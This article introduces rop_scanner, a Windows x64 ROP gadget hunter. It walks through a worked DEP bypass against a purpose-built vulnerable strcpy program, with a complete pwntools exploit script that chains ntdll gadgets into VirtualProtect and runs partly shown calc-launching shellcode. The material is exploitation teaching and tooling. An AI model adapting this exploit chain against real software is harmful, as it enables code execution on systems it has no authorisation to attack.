ROP Gadget Hunting on Windows: Building a DEP-Bypass Exploit Chain with rop_scanner

Project: github.com/oxfemale/rop_scanner — offline ROP / JOP / syscall / pivot gadget hunter for Windows PE files, written in C++17, decoder powered by Zydis. Cross-platform (Windows / Linux / macOS), single self-contained binary. Builds on the technique described by 0x12 Dark Development (@Salsa12__) in «Hunting ROP Gadgets in Windows DLLs» on Medium.

Figure: rop_scanner turns raw PE bytes into x86_64 ROP, JOP, syscall and stack-pivot gadgets (offline PE → Zydis → ROP / JOP / syscall / pivot gadgets, one codebase for Windows / Linux / macOS).

Executive Summary

Exploiting a modern user-mode Windows process on x86_64 almost always ends the same way: you control RIP, you cannot execute the stack because of DEP, you cannot just smash a function pointer because of CFG, and you have a handful of bytes to work with before a string terminator or an HTTP delimiter cuts your payload in half. The pragmatic answer is still Return-Oriented Programming: stitching together short fragments of already-loaded code (pop rcx ; ret, xchg rax, rsp ; ret, syscall) to reach an API like VirtualProtect and flip a page of attacker-controlled memory to RWX. The hard part is no longer the idea. The hard part is finding the right gadgets in the right modules, on the right Windows build, with the right bad-byte set, that are simultaneously CFG-legal and free of nulls. That is what rop_scanner automates.

This article walks the full loop end-to-end on a deliberately vulnerable Windows console program. We build the vuln, take RIP, decide what the ROP chain has to accomplish, run rop_scanner against ntdll.dll to source every gadget the chain needs, hand the catalog straight into pwntools, and detonate the payload. Everything below is reproducible on a clean Windows 11 VM with no third-party scanners, no debugger plugins, and no IDA. The point is not to publish a 0-day; the point is to show, in one sitting, what a 2026-era ROP build pipeline looks like when the tooling is finally fast enough that gadget hunting stops being the bottleneck.

Why yet another gadget scanner?

If you have written a Windows exploit in the last five years you have probably used ROPgadget, ropper, or rp++. All three are good tools and all three were originally designed to be format-agnostic: they read ELF, PE, Mach-O, they output a flat list of asm ; ret sequences, and they leave the choosing to you. That is exactly the workflow that breaks in 2026, for four concrete reasons:

MSVC does not emit «convenient» epilogues. The textbook Windows x64 argument loader, pop rcx ; pop rdx ; pop r8 ; pop r9 ; ret, almost never exists as a clean function exit. It has to be discovered as a side effect of mid-instruction decoding: you start the decoder at an unintended byte offset inside the body of some unrelated function, and the bytes happen to disassemble into the loader you want.
Control Flow Guard (CFG), XFG, and CET Shadow Stack each rule out whole classes of candidates. You need to know which RVAs the loader will accept as indirect-call targets (the GuardCFFunctionTable referenced from IMAGE_LOAD_CONFIG_DIRECTORY, from which the loader builds the CFG bitmap) so you can either target them deliberately, or stay clear and pivot through ret instead.
Bad bytes (\x00, \x0a, \x0d, the HTTP query delimiter ?, a protocol-specific magic byte) can eliminate a large share of the surface a vanilla scanner returns. Filtering them after the fact in Python is annoying and slow.
Cross-module ranking. The truly durable gadgets are the ones that show up in every default-loaded Windows module. A pop rcx ; ret at a fixed RVA inside an obscure DLL breaks the moment the victim is on a different patch level. You want to know which gadgets are ubiquitous, not which one looked fine on your test box.

rop_scanner solves the four problems above directly: full Zydis decoding (so mid-instruction discoveries are first-class), native parsing of CFG / .pdata / EAT, a bad-byte filter applied during gadget validation rather than after, and a batch mode that aggregates by asm text across dozens of modules so the top of the list is «present everywhere». One .dll on the command line, or the entire C:\Windows\System32 tree: one command, one ranked output.

Figure: where rop_scanner sits in a typical x64 ROP exploit chain, between RIP control and VirtualProtect. Stages 1 and 2 are taught in every exploitation class; stage 3 is where the work happens in 2026.

Architecture

The pipeline is intentionally boring. Five stages, each isolated in its own translation unit, each replaceable on its own.

Figure: the five-stage pipeline (PE file → pe_loader → ending finder → back-decoder (Zydis) → classify), with four output formats. The input PE is never mapped by the loader, never handed to a JIT, and never executed, so you can safely scan known-malicious samples.

Stage	Source file	What it does
PE parsing	`pe_loader.cpp` + `pe_types.h`	MZ → PE → section headers → `IMAGE_DIRECTORY_ENTRY_EXPORT`, `_EXCEPTION` (the `.pdata` `RUNTIME_FUNCTION` table), `_LOAD_CONFIG` (the CFG `GuardCFFunctionTable` bitmap). Pure byte-level reads; static asserts on every struct size.
Ending finder	`scanner.cpp`	For every byte of every executable section, ask Zydis to decode one instruction starting there. If it is `ret`, `ret imm16`, `syscall`, `sysenter`, `jmp reg` or `call reg`, mark this offset as a candidate gadget terminator.
Back-decoder	`scanner.cpp`	For each candidate terminator, sweep every possible start offset from `endPos - maxBytes` up to `endPos` itself. Decode forward. A start is valid only if the instruction stream exactly reaches the terminator in at most `maxInsn` instructions and contains no control-flow opcodes in the body.
Classification	`gadget.cpp`	Tags every gadget on two independent axes (category × semantic), assigns a score 0–100 with bonuses for x64-Windows ABI patterns (`pop rcx`, `pop rdx`, …) and pivots (`xchg rax, rsp`, `leave`).
Annotation	`symbol_resolver.cpp`	Nearest export from the EAT, enclosing function from `.pdata`, optional PDB resolution via `dbghelp` on Windows (respects `_NT_SYMBOL_PATH`), and CFG-valid / CFG-invalid flag.
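The ending-finder and back-decoder stages in the table can be sketched in a few lines of Python. This is a toy under stated assumptions: the hypothetical decode() below understands only pop, ret, nop and mov rax, imm64, standing in for Zydis, and only plain ret counts as a terminator. The test buffer is a single mov rax, imm64 whose immediate happens to contain the argument-loader bytes, so decoding from the real instruction start overshoots the C3, while decoding from inside the immediate lands on it exactly.

```python
# Toy stand-in for Zydis: understands only the few encodings used below.
# Returns (length, text) for the instruction at `pos`, or None.
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

def decode(code, pos):
    b = code[pos]
    if b == 0xC3:
        return 1, "ret"
    if b == 0x90:
        return 1, "nop"
    if 0x58 <= b <= 0x5F:                                    # pop r64 (58+rd)
        return 1, "pop " + REGS[b - 0x58]
    if b == 0x41 and pos + 1 < len(code) and 0x58 <= code[pos + 1] <= 0x5F:
        return 2, f"pop r{8 + code[pos + 1] - 0x58}"         # REX.B: pop r8..r15
    if b == 0x48 and pos + 9 < len(code) and code[pos + 1] == 0xB8:
        imm = int.from_bytes(code[pos + 2:pos + 10], "little")
        return 10, f"mov rax, {imm:#x}"                      # REX.W mov rax, imm64
    return None

def find_gadgets(code, max_bytes=16, max_insn=6):
    found = []
    for end in range(len(code)):
        term = decode(code, end)
        if term is None or term[1] != "ret":                  # ending finder
            continue
        for start in range(max(0, end - max_bytes), end + 1):  # back-decoder sweep
            pos, body = start, []
            while pos < end and len(body) < max_insn:
                insn = decode(code, pos)
                if insn is None or insn[1] == "ret":          # undecodable or control flow
                    break
                body.append(insn[1])
                pos += insn[0]
            if pos == end:                                    # landed exactly on the ret
                found.append((start, " ; ".join(body + ["ret"])))
    return found

# One aligned instruction, mov rax, imm64, whose immediate hides 59 5A 41 58 41 59 C3.
code = bytes.fromhex("48B8595A41584159C390")
for start, asm in find_gadgets(code):
    print(f"+{start}: {asm}")
```

Offset 0 is rejected because the aligned mov rax, imm64 swallows the C3; every start inside the immediate survives, from +2 (the full pop rcx ; pop rdx ; pop r8 ; pop r9 ; ret) down to +8 (a bare ret), including an unintended pop rax ; pop r9 ; ret at +5.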

Five passes, all single-threaded, all deterministic. The same ntdll.dll produces bit-for-bit identical output on Windows MSVC, Linux GCC and macOS AppleClang, as long as the Windows-only PDB resolution is left out of the comparison.

Two design choices are worth calling out. First, the decoder is the real Zydis, not a hand-rolled mini-decoder. The first prototype of this project shipped with about 250 lines of bespoke instruction matching that understood pop reg, ret, a few mov forms and add rsp. Zydis 4.1 covers all of x86 and x86_64, including VEX / EVEX, unusual mov [mem], reg forms, lea, cmov*, pushfq / popfq, and arbitrary memory operands. That unlocks the write-mem and read-mem semantic filters, which a hand decoder simply could not implement at the level of correctness required to trust the result. Second, the input PE is never handed to the OS loader. LoadLibrary is never called, no JIT consumes the bytes, no symbol resolution touches the import table at runtime — the parser walks the on-disk image byte by byte. You can safely scan an unknown sample on a researcher workstation without any sandboxing.

Anatomy of a gadget

Figure: anatomy of a ROP gadget. Bytes 59 5A 41 58 41 59 C3 decode as pop rcx ; pop rdx ; pop r8 ; pop r9 ; ret, the textbook Windows x64 argument loader, often hidden inside a sufficiently large PE at an unintended byte offset. rop_scanner finds it; the score bonuses give it a clean 100/100.

Seven raw bytes, 59 5A 41 58 41 59 C3, decode into five instructions: pop rcx, pop rdx, pop r8 (the 41 REX.B prefix extends the register number), pop r9, and ret. The terminator (C3) places this gadget in the rop category. The body is four unconditional pops that load exactly the first four argument registers of the Windows x64 ABI (RCX, RDX, R8, R9), so the semantic tag is load-const. The score bonus rules add +10 for each ABI-argument pop, capping the gadget at 100/100. In practice this exact sequence is almost never a real function epilogue. The scanner finds it because the seven bytes sit inside the encoding of one or more unrelated instructions (in an immediate, in a displacement, or straddling an instruction boundary), and decoding from the 59 byte instead of from the compiler's instruction boundary yields our gadget. That is the «mid-instruction» magic that makes Zydis-based discovery dramatically more productive than a function-epilogue scan.
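The register arithmetic in that decode is simple enough to show directly. A minimal sketch that handles only plain or REX-prefixed pop r64 (opcode 58+rd) and ret: the low three opcode bits select the register and REX.B supplies the fourth bit, which is how 41 58 becomes pop r8 rather than pop rax. The function name decode_pops is ours, for illustration only.

```python
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
        "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]

def decode_pops(raw):
    """Decode a run of (optionally REX-prefixed) pop r64 ending in ret."""
    out, i = [], 0
    while i < len(raw):
        rex_b = 0
        if 0x40 <= raw[i] <= 0x4F:          # REX prefix 0100WRXB; keep the B bit
            rex_b = raw[i] & 1
            i += 1
        op = raw[i]
        if 0x58 <= op <= 0x5F:              # POP r64: low 3 bits + REX.B pick the register
            out.append("pop " + REGS[(op - 0x58) | (rex_b << 3)])
        elif op == 0xC3:
            out.append("ret")
        else:
            raise ValueError(f"unsupported opcode {op:#04x}")
        i += 1
    return " ; ".join(out)

print(decode_pops(bytes.fromhex("595A41584159C3")))
# pop rcx ; pop rdx ; pop r8 ; pop r9 ; ret
```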

Classification: category × semantic

Figure: the two-axis gadget taxonomy. Category answers how a gadget ends; semantic answers what a gadget does. Both are exposed as substring filters to --filter.

Every gadget carries two tags:

Category tells you where the gadget belongs in the chain. rop is consumed off the stack with ret. jop is reached through an indirect jmp reg or call reg. syscall drops directly into kernel mode. pivot changes rsp.
Semantic tells you what the body does between start and terminator: load-const sets registers from the stack, mov-reg moves between registers, write-mem stores to memory, read-mem loads from memory, arith does integer math, stack-pivot changes the stack, syscall kernel-transitions, indirect hands off control through a register.

Why two axes? Because the categories and semantics decouple cleanly in practice. A write-mem primitive is useful whether it ends in ret or jmp r14; you want to filter on the body effect first, then pick the terminator that fits your chain. --filter "write-mem" returns every write-what-where primitive (mov [rax], rdx ; ret, mov [rcx+0x10], r8 ; ret, …) regardless of how they end. --filter "load-const" returns every argument-loader. The two filters compose with bad-byte filtering and CFG filtering so you can express the question precisely.
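A minimal sketch of two-axis tagging plus a substring filter, assuming Intel-syntax asm strings joined with " ; " as in the scanner output shown later. The rules below are our own simplification for illustration, not the logic in gadget.cpp, and the fallback tag "other" is ours rather than one of the article's tags.

```python
ARITH = {"add", "sub", "xor", "and", "or", "inc", "dec", "neg", "imul", "shl", "shr"}

def split(insn):
    """'mov [rax], rdx' -> ('mov', ['[rax]', 'rdx'])"""
    mnem, _, ops = insn.strip().partition(" ")
    return mnem, [o.strip() for o in ops.split(",")] if ops else []

def writes_rsp(insn):
    mnem, ops = split(insn)
    if mnem == "leave":
        return True
    if mnem == "xchg":
        return "rsp" in ops
    return bool(ops) and ops[0] == "rsp"        # add/sub/mov/pop rsp, ...

def classify(asm):
    """Return (category, semantic) for an asm string like 'pop rcx ; ret'."""
    insns = [s.strip() for s in asm.split(";")]
    body, term = insns[:-1], split(insns[-1])[0]
    if term in ("syscall", "sysenter"):
        return "syscall", "syscall"
    if any(writes_rsp(i) for i in body):
        return "pivot", "stack-pivot"
    cat = "jop" if term in ("jmp", "call") else "rop"
    parsed = [split(i) for i in body]
    if any(m == "mov" and ops and "[" in ops[0] for m, ops in parsed):
        return cat, "write-mem"
    if any(m != "lea" and len(ops) > 1 and "[" in ops[1] for m, ops in parsed):
        return cat, "read-mem"
    if body and all(m == "pop" for m, _ in parsed):
        return cat, "load-const"
    if any(m == "mov" for m, _ in parsed):
        return cat, "mov-reg"
    if any(m in ARITH for m, _ in parsed):
        return cat, "arith"
    return cat, ("indirect" if cat == "jop" else "other")

def matches(asm, needle):
    """Substring match against 'category/semantic' plus the asm text."""
    cat, sem = classify(asm)
    return needle in f"{cat}/{sem} {asm}"

gadgets = ["pop rcx ; ret", "mov [rax], rdx ; ret", "add rsp, 0x30 ; pop rcx ; ret",
           "mov [rcx+0x10], r8 ; ret", "mov r10, rcx ; mov eax, 0x18 ; syscall", "jmp r14"]
for g in gadgets:
    print(f"[{'/'.join(classify(g))}] {g}")
print([g for g in gadgets if matches(g, "write-mem")])
```

Because the filter string is matched against both the tag and the asm text, "write-mem" selects by body effect while "pop rcx" still works as a plain instruction search.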

The worked example: a vulnerable echo program

To make the rest concrete, we need a target. Below is the smallest possible Windows console program that we can write, compile, and exploit end-to-end on a clean Windows 11 VM. It accepts one command-line argument and copies it into a fixed-size stack buffer using strcpy: no bounds check, no length validation. We disable the stack cookie (/GS-) so the overflow does not get caught at function exit, and we disable ASLR for the executable (/DYNAMICBASE:NO) so its own layout is deterministic; system DLLs such as ntdll.dll and kernel32.dll are still rebased once per boot, so their bases are read from the live process. DEP stays on, because removing DEP turns the demo into something trivial that does not need a ROP chain. Getting executable memory despite DEP is exactly the chain's job.

// vuln.c — reachable Windows x64 stack overflow, DEP-enabled.
// Build (Developer Command Prompt for VS 2022):
//   cl /Zi /Od /GS- /DYNAMICBASE:NO vuln.c /link /SUBSYSTEM:CONSOLE
//
#include <stdio.h>
#include <string.h>
#include <windows.h>

static void handle_input(const char *user_input) {
    char buf[64];
    strcpy(buf, user_input);          // unbounded copy — classic stack smash
    printf("got: %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    handle_input(argv[1]);
    return 0;
}

Compile, then send it a long unique argument to find the precise offset between the start of buf and the saved return address. The classic pwntools cyclic pattern works on Windows too; here we generate it with a one-line Python call and pass it to the victim as its command-line argument:

PS C:\vuln> cl /nologo /Zi /Od /GS- /DYNAMICBASE:NO vuln.c /link /SUBSYSTEM:CONSOLE
vuln.c
   Creating library vuln.lib and object vuln.exp

PS C:\vuln> python -c "from pwn import cyclic; import sys; sys.stdout.buffer.write(cyclic(200))" > pat.txt
PS C:\vuln> .\vuln.exe (Get-Content -Raw pat.txt)
got: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaap...
# < access violation, crash dialog >
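# In WinDbg / x64dbg: the overwritten return address is non-canonical, so the
# fault is usually reported on handle_input's ret and RIP still points there.
# Read the pattern from the qword at [rsp] instead:
0:000> dq rsp L1
# On the attacker box, cyclic_find() on the low 4 bytes of that qword returns 72.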
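pwntools' default cyclic pattern is a de Bruijn sequence over the lowercase alphabet with 4-character windows, which is why every 4-byte slice identifies a unique offset. If pwntools is not available where you read the crash, this minimal sketch reproduces the pattern with the classic recursive construction. We assume the default alphabet and window size, which match the aaaabaaacaaa... output above; the code is ours, not pwntools' implementation.

```python
import itertools
import string

def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Yield the de Bruijn sequence B(len(alphabet), n), one symbol at a time."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:                       # emit the Lyndon word a[1..p]
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length, alphabet=string.ascii_lowercase, n=4):
    return "".join(itertools.islice(de_bruijn(alphabet, n), length))

def cyclic_find(sub, alphabet=string.ascii_lowercase, n=4):
    """Offset of the first n symbols of `sub` in the pattern, or -1."""
    if isinstance(sub, bytes):
        sub = sub.decode("latin-1")
    window = ""
    for i, ch in enumerate(de_bruijn(alphabet, n)):
        window = (window + ch)[-n:]              # sliding n-symbol window
        if window == sub[:n]:
            return i - n + 1
    return -1

print(cyclic(16))              # aaaabaaacaaadaaa
print(cyclic_find(b"saaa"))    # 72
```

On x64, feed it the first 4 bytes of the qword that overwrote the return address; at offset 72 the full qword is saaataaa, which reads as 0x6161617461616173 little-endian.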

On our build the offset came out at 72 bytes: the 64 bytes of buf plus 8 more bytes of frame, then the 8-byte saved return address. MSVC x64 code does not normally keep an RBP frame pointer, so do not assume those extra 8 bytes are a saved RBP; treat the layout as build-specific and always measure it. Our payload is therefore 72 bytes of filler, then the ROP chain. With DEP on and shellcode placed somewhere predictable on the stack, the chain has exactly one job: get to a point where the stack page is executable. The canonical answer is VirtualProtect.

What the chain actually has to do

The Win32 signature is:

BOOL VirtualProtect(
    LPVOID lpAddress,        // RCX
    SIZE_T dwSize,           // RDX
    DWORD  flNewProtect,     // R8  — 0x40 = PAGE_EXECUTE_READWRITE
    PDWORD lpflOldProtect);  // R9  — writable scratch pointer

Four arguments, register-passed under the Windows x64 ABI. To set them from a ROP chain we need:

A way to load RCX with the address of our shellcode buffer.
A way to load RDX with the size to remap (anything ≥ shellcode length; we pick 0x1000, one page).
A way to load R8 with 0x40 (PAGE_EXECUTE_READWRITE).
A way to load R9 with a writable address that VirtualProtect can use for the old-protection out-param.
A clean return into VirtualProtect itself.
A return address for VirtualProtect itself: the address of our shellcode, so that VirtualProtect's own ret lands on it once the page is executable.

The ideal world is a single gadget: pop rcx ; pop rdx ; pop r8 ; pop r9 ; ret. In practice, on Windows 11 ntdll.dll that combined gadget shows up only on odd byte boundaries inside a few floating-point and math helpers, and any one of them may carry a bad byte that breaks our strcpy delivery. We have to look. This is the part where rop_scanner earns its keep.

Sourcing the gadgets

First, the baseline scan. We point rop_scanner at a copy of ntdll.dll (the file from C:\Windows\System32\ntdll.dll on our target build) and look at the top-scoring gadgets:

$ ./rop_scanner ntdll.dll | head -40
[+] module: ntdll.dll arch=x64 machine=0x8664 image_base=0x180000000
    sections=15 exports=2516 pdata=5679 cfg=2197
[+] gadgets: 17243

[pivot/stack-pivot] score=100 section=.text rva=0x0011F03A
  symbol: RtlCaptureContext2+0xFA
  function: fn_0x11EF40+0xFA
  bytes: 48 83 C4 30 59 C3
  asm  : add rsp, 0x30 ; pop rcx ; ret

[rop/load-const] score=70 section=.text rva=0x000026B9
  symbol: RtlGetUserInfoHeap+0xB9
  function: fn_0x2600+0xB9
  bytes: 5E 5F C3
  asm  : pop rsi ; pop rdi ; ret
...

The header line is the module passport. Then gadgets in descending score order. Each entry is decorated with the nearest EAT export, the enclosing .pdata function, raw bytes, and the Zydis-formatted disassembly. The first one is a pivot — useful later. The second is a clean two-argument loader.

1. Loaders for the four argument registers, bad-byte clean

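Our delivery vector is strcpy, so the absolute bad byte is \x00. In case the wrapper that calls us ever moves to an HTTP or line-based protocol, we also exclude \x0a and \x0d: cheap insurance. Keep in mind that strcpy stops at the first \x00 anywhere in the payload, and every canonical x64 user-mode address packs into a qword whose top two bytes are 00. A bad-byte-clean gadget list is necessary but not sufficient: a multi-qword chain like the one below only reaches the stack intact through a copy primitive that tolerates NUL bytes (memcpy, fread, recv).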

$ ./rop_scanner ntdll.dll \
    --filter "pop rcx" \
    --badbytes 00,0a,0d \
    --min-score 75 \
    --limit 10

Running the same query with --filter "pop rdx" and --filter "pop r9" as well, for our build we get, among others:

[rop/load-const] score=85 section=.text rva=0x000A8C13
  symbol: RtlExpandEnvironmentStrings_U+0x213
  bytes: 59 C3
  asm  : pop rcx ; ret

[rop/load-const] score=80 section=.text rva=0x000A1F4E
  symbol: RtlAllocateHeap+0x14E
  bytes: 5A 41 58 C3
  asm  : pop rdx ; pop r8 ; ret

[rop/load-const] score=80 section=.text rva=0x000B7321
  symbol: RtlpInterlockedPushEntrySList+0xC1
  bytes: 41 59 C3
  asm  : pop r9 ; ret

Three gadgets, three RVAs, all bad-byte clean, all reachable through plain ret. We will chain pop rcx ; ret, then pop rdx ; pop r8 ; ret (loads two registers in one shot), then pop r9 ; ret. That is exactly four pop slots in the chain — one for each argument — followed by the absolute address of VirtualProtect.

2. A writable scratch address for the R9 out-pointer

VirtualProtect writes the previous protection value through its fourth argument. The simplest writable region we know exists is the .data section of ntdll.dll itself. rop_scanner exposes the section table; pick any 4-byte-aligned offset inside .data that does not hold anything live. For our build, RVA 0x17A3A8 works (inside .data, currently zero). At ntdll's preferred image base that is 0x18017A3A8, but the runtime address is the module's actual base plus that RVA, and packed as a little-endian qword it still carries 00 bytes in its upper half, like every x64 user-mode address.

3. The address of VirtualProtect

kernel32.dll exports VirtualProtect, but that export is a thin stub that jumps into the real implementation in kernelbase.dll; either export works as a chain target, and we use kernel32's. rop_scanner resolves export RVAs from the EAT, but the image base it prints is the preferred one from the PE header, so the runtime base has to come from the live process. On our target, kernel32.dll was mapped at 0x7FFB44D80000 with VirtualProtect at export RVA 0x1B940, giving 0x7FFB44D9B940. Its low six bytes are free of bad bytes, but packed as a qword its top two bytes are 00, which is acceptable only if the delivery path tolerates NUL bytes.
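What the copy primitive sees is the packed little-endian qword, not the hex literal, so that is the form to check against the bad-byte set. A minimal sketch; the helper name packed_badbytes is ours, and the two addresses are the scratch slot at ntdll's preferred base and the kernel32!VirtualProtect address from this build.

```python
import struct

def packed_badbytes(addr, badbytes=b"\x00\x0a\x0d"):
    """Offsets inside the packed little-endian qword that hit a bad byte."""
    raw = struct.pack("<Q", addr)
    return [i for i, b in enumerate(raw) if b in badbytes]

for name, addr in [("scratch (preferred base)", 0x18017A3A8),
                   ("kernel32!VirtualProtect", 0x7FFB44D9B940)]:
    print(f"{name:26} {struct.pack('<Q', addr).hex(' ')}  bad at {packed_badbytes(addr)}")
# scratch:        a8 a3 17 80 01 00 00 00  bad at [5, 6, 7]
# VirtualProtect: 40 b9 d9 44 fb 7f 00 00  bad at [6, 7]
```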

4. A landing pad: back to the stack

When pop r9 ; ret transfers control into VirtualProtect, RSP points at the qword right after the VirtualProtect address, and VirtualProtect treats that qword as its return address. That slot must therefore hold the address of our shellcode, not the shellcode itself, and the same address goes into RCX as lpAddress (the page we want made executable). The Windows x64 ABI also lets the callee use the 32 bytes of home (shadow) space just above its return address, so four filler qwords go there and the shellcode starts after them. Concretely: the saved return address overwrite is at offset 72; the chain is eight qwords (three gadget addresses, four popped values, VirtualProtect) plus the return slot and four shadow-space qwords, 13 qwords or 104 bytes in total; so the shellcode starts at offset 72 + 104 = 176 from buf[0]. The exact arithmetic is in the pwntools script below.

Exporting to pwntools

Once we have shortlisted the candidates, we can have rop_scanner generate a Python dictionary that drops straight into the exploit script:

$ ./rop_scanner ntdll.dll \
    --filter "pop rcx ; ret" \
    --badbytes 00,0a,0d \
    --format pwntools > gadgets_rcx.py

$ ./rop_scanner ntdll.dll \
    --filter "pop rdx" \
    --badbytes 00,0a,0d \
    --format pwntools > gadgets_rdx.py

$ ./rop_scanner ntdll.dll \
    --filter "pop r9 ; ret" \
    --badbytes 00,0a,0d \
    --format pwntools > gadgets_r9.py

Each file contains a Python literal: a dict keyed by asm text, valued with image_base, RVA, absolute address, and the source symbol. You concatenate them and import into the exploit. The whole gadget-sourcing step takes about a second on a laptop — that is the difference between «ROP is tedious» and «ROP is a build step».
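One step the merge has to include is rebasing: the absolute addresses in these files are presumably computed from the preferred image base the scanner prints (0x180000000 for ntdll.dll), while system DLLs load at a per-boot randomized base. A minimal sketch, assuming a hypothetical record shape; the key names image_base and rva are placeholders, not the documented --format pwntools schema, so check a real gadgets_*.py first.

```python
# HYPOTHETICAL record shape: key names are placeholders, not the real schema.
gadgets_rcx = {"pop rcx ; ret":          {"image_base": 0x180000000, "rva": 0x000A8C13}}
gadgets_rdx = {"pop rdx ; pop r8 ; ret": {"image_base": 0x180000000, "rva": 0x000A1F4E}}
gadgets_r9  = {"pop r9 ; ret":           {"image_base": 0x180000000, "rva": 0x000B7321}}

def rebase(catalog, runtime_base):
    """Runtime address of each gadget: actual module base + RVA."""
    return {asm: runtime_base + g["rva"] for asm, g in catalog.items()}

merged = {**gadgets_rcx, **gadgets_rdx, **gadgets_r9}   # later files win on duplicate asm
NTDLL_RUNTIME_BASE = 0x7FF000000000   # placeholder: read the real base from the live process
for asm, addr in rebase(merged, NTDLL_RUNTIME_BASE).items():
    print(f"{addr:#018x}  {asm}")
```

Keying everything on RVA rather than on the exported absolute address means a reboot only changes one constant.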

The final exploit

Putting all of it together, the exploit looks like this. The shellcode placeholder is a simple WinExec("calc.exe", SW_SHOW) — trivially replaceable with anything position-independent.

#!/usr/bin/env python3
# exploit.py: drives vuln.exe on a Windows 11 x64 target.
# Build vuln with:  cl /Zi /Od /GS- /DYNAMICBASE:NO vuln.c /link /SUBSYSTEM:CONSOLE
import struct, subprocess, sys

# ---- gadgets sourced from rop_scanner against this build of ntdll.dll ----
# /DYNAMICBASE:NO only pins vuln.exe. ntdll.dll and kernel32.dll are still
# rebased once per boot, so take both runtime bases from the live process.
NTDLL_BASE   = 0x0000000180000000        # PLACEHOLDER: preferred base from the PE header
KERNEL32     = 0x00007FFB44D80000        # snapped from running process
POP_RCX_RET            = NTDLL_BASE + 0x000A8C13   # pop rcx ; ret
POP_RDX_POP_R8_RET     = NTDLL_BASE + 0x000A1F4E   # pop rdx ; pop r8 ; ret
POP_R9_RET             = NTDLL_BASE + 0x000B7321   # pop r9 ; ret
WRITABLE_SCRATCH       = NTDLL_BASE + 0x0017A3A8   # free bytes in .data
VIRTUALPROTECT         = KERNEL32   + 0x0001B940   # kernel32!VirtualProtect

PAGE_EXECUTE_READWRITE = 0x40

# ---- minimal x64 shellcode: WinExec("calc.exe", 5) ; ExitProcess(0) ----
# Position-independent; resolves kernel32 via PEB walking. Built separately
# with msfvenom or your favourite generator. Truncated to fit:
SHELLCODE = bytes.fromhex(
    "fc4883e4f0e8c0000000415141505251"
    "5648315231d265488b5260488b521848"
    "8b5220488b7250480fb74a4a4d31c948"
    # ... <snip, real loader continues here, ~280 bytes> ...
    "63616c632e65786500"               # "calc.exe"
)

OFFSET_TO_RIP = 72                      # established empirically

# ---- payload layout ----------------------------------------------------
def q(x):
    return struct.pack("<Q", x)         # 8-byte little-endian

SHADOW_SPACE = 4 * 8                    # x64 home space the callee may overwrite

def build_chain(shellcode_addr):
    chain  = q(POP_RCX_RET)        + q(shellcode_addr)          # arg1: lpAddress
    chain += q(POP_RDX_POP_R8_RET) + q(0x1000)                  # arg2: dwSize
    chain +=                         q(PAGE_EXECUTE_READWRITE)  # arg3: flNewProtect (2nd pop)
    chain += q(POP_R9_RET)         + q(WRITABLE_SCRATCH)        # arg4: lpflOldProtect
    chain += q(VIRTUALPROTECT)                                  # entered via pop r9 ; ret
    chain += q(shellcode_addr)                                  # VirtualProtect returns here
    chain += b"B" * SHADOW_SPACE                                # filler for the home space
    return chain

CHAIN_LEN = 9 * 8 + SHADOW_SPACE        # 104 bytes: 9 qwords + 32 bytes of home space

def craft(buf_addr):
    # buf_addr is the runtime address of buf[0] in handle_input; the
    # shellcode sits right after the chain, at buf_addr + 72 + 104.
    shellcode_addr = buf_addr + OFFSET_TO_RIP + CHAIN_LEN
    chain = build_chain(shellcode_addr)
    assert len(chain) == CHAIN_LEN
    return b"A" * OFFSET_TO_RIP + chain + SHELLCODE

# ---- launch ------------------------------------------------------------
if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: exploit.py <path-to-vuln.exe> [buf-address-hex]")
    target  = sys.argv[1]
    # On /DYNAMICBASE:NO + /GS- the stack base is essentially fixed.
    # Take it from a debugger once; reuse forever.
    landing = int(sys.argv[2], 16) if len(sys.argv) > 2 else 0x00000019fe2ffa00
    payload = craft(landing)
    # Every packed 64-bit address above has 00 in its top bytes. argv cannot
    # carry NUL (subprocess raises ValueError) and strcpy would stop at the
    # first one anyway, so refuse instead of launching a truncated payload.
    if b"\x00" in payload:
        sys.exit(f"payload contains {payload.count(0)} NUL bytes; "
                 "use a NUL-tolerant delivery path (memcpy/fread/recv)")
    subprocess.run([target, payload], check=False)

Two ergonomic notes. First, the chain uses one gadget to pop two registers (pop rdx ; pop r8 ; ret); compared with separate pop rdx ; ret and pop r8 ; ret gadgets, that saves one gadget address, 8 bytes of payload. Second, the «return into shellcode» trick works because VirtualProtect's own ret pops the next stack qword as the new RIP, so the chain has to put the shellcode's address in that qword (leaving the callee's 32-byte shadow space free above it), not the shellcode bytes themselves. No explicit pivot needed.

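Run it through a delivery path that gets the whole chain, NUL bytes included, onto the stack intact, and calc pops. DEP is still on, and no CFG check ever fires because a ret chain never makes a guarded indirect call; the difference is that we asked the kernel politely to mark our buffer executable, and the kernel said yes because the call came through a legitimate library function with all four arguments correctly placed.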

A GUI, if you’d rather click than type

The CLI is the source of truth and almost certainly what you will use inside an actual exploit pipeline. That said, the project now ships an optional Qt6 GUI (with a Qt5 fallback) that builds from the same source tree and shells out to the same rop_scanner binary — every CLI flag is exposed as a form field, and the GUI rebuilds the exact command line behind the scenes. It is the same engine, just with checkboxes.

Figure: layout of the Qt6 GUI. Top: mode selector and target path with drag-and-drop. Middle: the Scanning and CFG / Symbols groups, one form field per CLI flag. Bottom: output-format dropdown, the binary auto-detector, the ▶ Run scan button, and a streaming dark console showing the scanner output.

What the GUI does for you, beyond the obvious:

Drag-and-drop a file or a directory onto the window. The mode selector flips automatically; you do not have to remember whether you are in single-file or --dir mode.
Every CLI flag is a form field: --max-bytes, --max-insn, --min-score, --filter, --badbytes, --limit, the CFG radio group (--only-cfg / --exclude-cfg), --no-symbols, --pdb, and the recursive checkbox.
